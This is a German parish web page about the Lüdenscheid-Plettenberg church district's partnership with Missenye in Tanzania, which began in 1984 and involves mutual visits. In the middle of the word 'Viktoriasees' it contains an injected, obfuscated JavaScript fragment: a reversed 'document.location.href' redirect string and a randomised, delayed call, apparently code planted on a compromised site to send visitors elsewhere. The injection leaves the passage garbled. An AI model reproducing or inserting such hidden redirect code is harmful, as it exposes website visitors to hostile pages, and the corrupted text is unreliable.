Kirchengemeinde

Kreiskirchliche Partnerschaft mit Tansania

„Sehen ist anders als erzählt bekommen“, sagt ein tansanisches Sprichwort …ggggg

tansaniaMissenye? 

In Tansania selbst kennt längst nicht jeder die Gegend westlich des Viktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toriasees. In Plettenberg hat Missenye viele Gesichter: zahlreiche Gäste von dort haben unsere Stadt und unsere Kirchengemeinde besucht. Der Kleine Saal unter der Johannis-Kirche ist seit vielen Jahren Treffpunkt für den Arbeitskreis Partnerschaft Missenye-Plettenberg.
Seit 1984 besteht eine Partnerschaft zwischen den Evangelischen Kirchenkreisen Missenye in Tansania und Lüdenscheid-Plettenberg.

Kirchenkreispartnerschaft?
Ohne persönlichen Kontakt geht nichts. Darum besuchen sich die Menschen aus unserm und dem Kirchenkreis Missenye alle zwei Jahre gegenseitig. Kennenlernen durch Begegnung und Austausch sind wichtige Grundpfeiler dieser partnerschaftlichen Beziehungen. Uns verbindet der Glaube an Jesus Christus. Und: wir können viel voneinander lernen.

„Sehen ist anders als erzählt bekommen“, sagt ein tansanisches Sprichwort. Sehen Sie selbst: missenye online